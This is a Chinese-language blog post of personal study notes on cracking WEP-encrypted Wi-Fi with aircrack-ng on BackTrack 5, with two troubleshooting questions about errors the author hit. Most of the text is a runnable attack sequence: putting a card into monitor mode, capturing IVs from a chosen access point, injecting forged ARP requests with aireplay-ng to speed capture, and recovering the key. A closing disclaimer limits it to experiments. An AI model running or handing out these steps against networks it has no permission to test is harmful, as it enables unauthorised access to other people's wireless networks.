關於aircrack-ng的一些學習筆記及問題

    最近無意中接觸到了一些無線方面的技術資料,又發現了一個比較速度的wifi***方法,這個雖然沒有reaver那麼穩定,個人覺得在時間方面要比reaver快的多。可能做實驗的筆記本太舊的原因,途中遇到幾個問題,如果有同仁遇到,還請指點一二。此處先記錄下這幾條主要命令備忘。



環境是BT5,默認安裝了較高版本,所以不用升級,但還是附上安裝命令:


wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz

tar zxvf <name of source file>

cd aircrack-ng-XXX

make

make install



下面就拿WEP加密做示例:


查看無線網卡,一般默認是wlan0,如果有外置或其他無線網卡,那就選擇相應的網卡啓用即可。


單獨查看無線網卡信息:iwconfig


啓用無線網卡:ifconfig wlan0 up



激活網卡至監聽(monitor)模式:

airmon-ng start wlan0


掃描當前地點無線網絡信息:

airodump-ng mon0


開始抓包,保存爲logas前綴的.ivs後綴,6爲AP的頻道

airodump-ng --ivs -w longas -c 6 wlan0


在上條命令運行的情況下,打開一個新的終端窗口,輸入下面命令對目標AP進行ArpRequest注入***,這樣採用了一種稱之爲ArpRequest的方式來讀取ARP請求報文,並僞造大量的報文再次重發出去,以便刺激AP產生更多的數據包,從而加快破解過程。

aireplay-ng -3 -b AP-mac -h Client-mac mon0


當IVs值達到2萬以上,可嘗試下面命令破解

aircrack-ng 捕獲的IVS文件



破解成功後,KEYFOUND!後面的ACSI碼就是密碼



PS:

問題1:

當在新窗口輸入airodump-ng --ivs -w longas -c 6 wlan0時,遇到了報錯:

ioctl(SIOCSWMODE) failed: Device or resource busy


ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE802.11,

AEPHRD_IEEE802.11_FULL or ARPHRD_IEEE80211_PRISM instead. Make

Sysfs injection support was not found either.


我嘗試的方法是使用命令:

sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
sudo iwconfig wlan0
sudo airmon-ng start wlan0
airodump-ng --ivs -w longas -c 6 wlan0

就可以了


問題2:

aireplay-ng -3 -b AP-mac -h Client-mac mon0時,出現了錯誤:

Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch

因爲這條命令並不直接影響結果,暫時也沒找到合適解決方法,如果各位有好的解決方法,請指點。



這裏只簡單的列出了主要用到的命令,僅供實驗參考,不得用於非法操作,否則後果自負。


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章